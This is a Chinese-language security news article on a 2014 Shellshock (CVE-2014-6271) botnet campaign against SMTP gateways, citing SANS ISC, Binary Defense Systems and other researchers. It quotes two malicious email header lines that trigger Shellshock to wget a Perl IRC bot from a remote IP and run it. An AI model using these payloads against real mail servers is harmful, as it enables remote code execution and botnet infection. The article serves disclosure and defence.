Bash破殼漏洞(ShellShock,CVE-2014-6271)新的利用方法又來了!根據(jù)互聯(lián)網(wǎng)風(fēng)暴中心( SANS InternetStorm Center )最新消息:破殼漏洞最新利用方法引發(fā)的新一輪攻擊正在醞釀中,這一次,破殼漏洞形成的僵尸網(wǎng)絡(luò)利用的是郵件服務(wù)器SMTP主機(jī),目標(biāo)是全球SMTP網(wǎng)關(guān)!
黑客們在試圖破壞SMTP系統(tǒng)
“嘿,我的老板啊,這次互聯(lián)網(wǎng)風(fēng)暴意味著什么你造嗎?意味著我給你回郵件都是危險(xiǎn)的!”
這次“破殼”利用的就是感染SMTP網(wǎng)關(guān),試圖在MTAs / MDAs中尋找可利用弱點(diǎn),然后攻擊者把惡意代碼隱藏在消息數(shù)據(jù)報(bào)頭中!
互聯(lián)網(wǎng)風(fēng)暴中心描述了一個用Perl編寫的IRC DDoS Robot,其Payload擁有“獲取和執(zhí)行遠(yuǎn)程代碼的能力”。
下面一個圖片就是包含“破殼”有效載荷的初始郵件攻擊例子:
二進(jìn)制防御系統(tǒng)BDS(Binary Defense Systems)已經(jīng)主動偵查到最新的攻擊細(xì)節(jié)。 那些已被破壞系統(tǒng)試圖通過破殼漏洞傳播僵尸網(wǎng)絡(luò),并在每個主要頭字段使用“破殼”漏洞下載僵尸網(wǎng)絡(luò)腳本。攻擊者利用的字段有:“To:”字段、“From:”字段、 “Subject”字段、 “Date:”字段、 “Message ID:” 等等還有其他未發(fā)現(xiàn)字段
Message-ID: { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend
References: { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend
BDS還還透露:
“為了感染SMTP網(wǎng)關(guān),并把它添加到現(xiàn)有僵尸網(wǎng)絡(luò)設(shè)備中去,有一個curl/wget/fetch/perl/lwp/etc的方法正在試圖從耶利哥安全團(tuán)隊(duì)(Jericho Security Team)摧毀基于perl的僵尸網(wǎng)絡(luò)。”
自從九月初發(fā)現(xiàn)“破殼”起,彈震癥漏洞已經(jīng)針對目標(biāo),在不同類型的設(shè)備上重復(fù)利用了許多次。許多安全專家也相繼發(fā)現(xiàn)了多次利用“破殼”漏洞攻擊全球設(shè)備的僵尸網(wǎng)絡(luò),包括攻擊 VOIP系統(tǒng) 和利用競選傳播惡意軟件的混亂的僵尸網(wǎng)絡(luò)。
蜜罐由專家AlienVault實(shí)驗(yàn)室檢測到試圖利用“破殼”漏洞的兩個不同惡意軟件樣本,消息披露至此不超過48小時。
9月底,火眼研究室(FireEye)也預(yù)言:“從惡意流量上觀察發(fā)現(xiàn),試圖利用Bash bug的大規(guī)模網(wǎng)絡(luò)攻擊正在路上。”